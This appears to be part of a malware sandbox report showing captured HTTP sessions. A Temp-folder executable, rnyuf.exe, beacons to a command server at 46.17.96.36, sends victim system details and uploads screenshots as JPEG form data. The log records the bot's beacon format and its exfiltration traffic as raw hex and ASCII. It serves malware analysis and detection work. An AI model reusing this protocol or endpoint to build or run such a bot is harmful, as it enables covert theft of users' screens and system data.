                                        Aug 29, 2021 22:27:08.940896034 CEST989OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:08.973484039 CEST992OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:08.973788977 CEST997OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:09.081614971 CEST1060INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:09 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.44973546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:08.914541006 CEST964OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:08.995714903 CEST1040INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:08 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 31 31 36 0d 0a 3c 63 3e 31 30 30 30 30 30 33 30 30 31 2b 2b 2b 67 48 6a 5a 7a 39 79 38 2f 59 73 35 76 4a 5a 33 34 50 6c 31 41 4d 53 67 56 57 31 65 67 4f 57 4b 70 67 73 30 2f 44 73 62 67 6a 61 52 41 6f 77 6b 44 34 37 69 51 65 69 46 4f 39 34 68 54 6a 35 6a 50 79 42 55 67 2f 33 46 7a 38 68 72 54 4f 73 47 4f 37 62 70 35 4a 6c 59 4d 45 66 4e 5a 74 33 36 7a 63 61 35 2b 47 7a 4b 35 64 72 45 39 43 70 43 44 39 58 72 45 58 68 67 5a 51 3d 3d 23 31 30 30 30 30 30 34 30 30 31 2b 2b 2b 67 48 6a 5a 7a 39 79 38 2f 59 73 35 76 4a 5a 33 34 50 6c 31 41 4d 53 67 56 57 31 65 67 4f 57 4b 70 67 73 30 2f 44 73 62 67 6a 61 52 41 6f 77 6b 44 34 37 69 51 65 69 46 4f 39 34 68 54 6a 35 6a 50 79 42 55 67 2f 33 46 7a 38 68 72 54 4f 73 47 4f 37 62 70 35 4a 5a 51 4e 45 72 45 59 4e 7a 39 7a 38 61 37 2b 6d 7a 4f 2b 39 2b 57 37 44 59 4e 41 4e 54 79 57 6d 56 39 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 116<c>1000003001+++gHjZz9y8/Ys5vJZ34Pl1AMSgVW1egOWKpgs0/DsbgjaRAowkD47iQeiFO94hTj5jPyBUg/3Fz8hrTOsGO7bp5JlYMEfNZt36zca5+GzK5drE9CpCD9XrEXhgZQ==#1000004001+++gHjZz9y8/Ys5vJZ34Pl1AMSgVW1egOWKpgs0/DsbgjaRAowkD47iQeiFO94hTj5jPyBUg/3Fz8hrTOsGO7bp5JZQNErEYNz9z8a7+mzO+9+W7DYNANTyWmV9#<d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        10192.168.2.44974546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:13.051842928 CEST2097OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:13.051963091 CEST2097OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:13.052170992 CEST2107OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:13.052321911 CEST2110OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:13.085886955 CEST2135OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:13.119160891 CEST2138OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:13.119285107 CEST2154OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:13.119321108 CEST2164OUTData Raw: 50 67 ce f8 cd 30 83 9e 6b e8 e5 f0 d6 88 07 fc 82 ed 7f ef 8a f3 3f 89 9a 7d 9d 95 cd 97 d9 2d a2 83 72 36 e1 18 c6 79 aa 85 5e 77 60 92 e5 3c 8e 93 14 99 a5 15 c6 7a 07 a6 fc 0d e3 c6 b7 bf f6 0e 7f fd 19 1d 7b ad f3 e2 df 1f de 60 3f af f4 af
                                        Data Ascii: Pg0k?}-r6y^w`<z{`?t}fA4;;;]> x!GVP)F{0T]Il;j|~)k%o1)qIJ+,)i3@4uR)<:s^Q_YH;x~^S
                                        Aug 29, 2021 22:27:13.119800091 CEST2167OUTData Raw: 4e 02 80 38 a7 01 4c 86 ce 97 c2 6b 98 f5 1f fa e4 3f 91 ae 74 f0 ed f5 ae a7 c1 f1 ee 83 53 3f f4 cb fa 1a e6 18 7c c7 eb 5c 14 25 fb fa 8b d0 ea ae ad 42 0f d4 6d 18 a5 c5 18 ae db 9c 37 12 9c 28 c5 00 50 20 a5 a5 c5 2e 3d aa 5b 10 98 a3 14 f0
                                        Data Ascii: N8Lk?tS?|\%Bm7(P .=[xF?AR[i?CU?H=9WeImd[k4>f)w5X*sJ1]/f@7yZKI/&:Z{77?/mZ_Z+
                                        Aug 29, 2021 22:27:13.119955063 CEST2185OUTData Raw: 19 f8 79 ce 5e 07 56 3d 4f 97 5e 6c 2a e2 29 d5 9c fd 9b d4 f5 6a 61 f0 d5 68 c2 0a a5 ac 71 29 a6 dd b9 f9 6d e4 3f f0 1a b2 9e 1f d4 1f fe 58 10 3d f8 ae 92 6d 73 48 bc 07 ec da c3 5b 7b 3c 78 ac e9 ed ae ae 01 6b 6f 11 43 2a 9e db f6 d7 42 c6
                                        Data Ascii: y^V=O^l*)jahq)m?X=msH[{<xkoC*BU{_TI`)gTO]dh{J<?og\ZtQfyS^J>tb[G9EJN~>lJ_Q0LoQaq\y5KK4:9<aNO
                                        Aug 29, 2021 22:27:13.152941942 CEST2188OUTData Raw: 62 c0 80 01 e3 9e 38 ce 6d c2 5a b6 5a 53 8e 88 f5 2b 4f 8f f6 76 31 b4 76 7e 0b 86 dd 19 b7 b2 c3 78 10 16 f5 20 45 d7 81 f9 55 8f f8 68 c1 ff 00 42 af fe 54 3f fb 5d 79 14 5e 1b b8 b8 bb d3 61 b4 bc b3 b9 8f 50 b8 7b 78 67 42 ea 81 94 ae e2 db
                                        Data Ascii: b8mZZS+Ov1v~x EUhBT?]y^aP{xgB00l,nr#&L`&>RGk_:g#^O-d>f+yc8L.no?6OO1d&<"B\@9'q"\Sw
                                        Aug 29, 2021 22:27:13.221765041 CEST2204INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:13 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        100192.168.2.44983846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:47.049220085 CEST9650OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:47.126179934 CEST9650INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:47 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        101192.168.2.44983946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:47.310086966 CEST9651OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:47.387438059 CEST9740INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:47 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        102192.168.2.44984046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:47.314251900 CEST9651OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642f
                                        Host: 46.17.96.36
                                        Content-Length: 110773
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:47.314394951 CEST9651OUTData Raw: 2d 2d 2d 2d 2d 2d 32 63 30 39 64 66 39 33 61 64 39 66 62 66 34 33 37 32 66 30 61 61 36 38 35 66 38 39 36 34 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2c09df93ad9fbf4372f0aa685f89642fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:47.314780951 CEST9661OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:47.315040112 CEST9664OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:47.347398996 CEST9675OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:47.347810030 CEST9683OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:47.347862959 CEST9689OUTData Raw: 1f c3 56 c5 cb 8f 7a 91 6e bd 68 f6 70 7d 43 da 54 46 69 86 41 fc 26 9a 55 87 50 45 6b 7d a5 0f 55 14 be 64 2d d5 45 3f 63 17 b3 0f 6c fa a3 23 14 95 ae 52 dd bb 51 f6 4b 73 d3 8a 9f 62 fa 31 fb 75 d5 19 34 56 a9 d3 e3 3d 1a a3 3a 61 ec c2 97 b1
                                        Data Ascii: Vznhp}CTFiA&UPEk}Ud-E?cl#RQKsb1u4V=:a{hx4e0KIt)TUijco"2;\KFKJp1J2n%-4!ih%8RSP(.($Zp*Si,ZQIJ*--%8SD;H.(&LShG.(>P!FmsG(s
                                        Aug 29, 2021 22:27:47.380009890 CEST9692OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:47.380050898 CEST9695OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:47.380422115 CEST9721OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:47.380494118 CEST9740OUTData Raw: 19 f8 79 ce 5e 07 56 3d 4f 97 5e 6c 2a e2 29 d5 9c fd 9b d4 f5 6a 61 f0 d5 68 c2 0a a5 ac 71 29 a6 dd b9 f9 6d e4 3f f0 1a b2 9e 1f d4 1f fe 58 10 3d f8 ae 92 6d 73 48 bc 07 ec da c3 5b 7b 3c 78 ac e9 ed ae ae 01 6b 6f 11 43 2a 9e db f6 d7 42 c6
                                        Data Ascii: y^V=O^l*)jahq)m?X=msH[{<xkoC*BU{_TI`)gTO]dh{J<?og\ZtQfyS^J>tb[G9EJN~>lJ_Q0LoQaq\y5KK4:9<aNO
                                        Aug 29, 2021 22:27:47.484462976 CEST9762INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:47 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        103192.168.2.44984146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:47.537049055 CEST9763OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:47.616208076 CEST9764INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:47 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        104192.168.2.44984246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:47.749437094 CEST9764OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----2c09df93ad9fbf4372f0aa685f89642f
                                        Host: 46.17.96.36
                                        Content-Length: 110773
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:47.749552965 CEST9764OUTData Raw: 2d 2d 2d 2d 2d 2d 32 63 30 39 64 66 39 33 61 64 39 66 62 66 34 33 37 32 66 30 61 61 36 38 35 66 38 39 36 34 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------2c09df93ad9fbf4372f0aa685f89642fContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:47.749747038 CEST9775OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:47.749875069 CEST9777OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:47.783030033 CEST9794OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:47.783181906 CEST9798OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:27:47.783225060 CEST9800OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:47.783422947 CEST9803OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
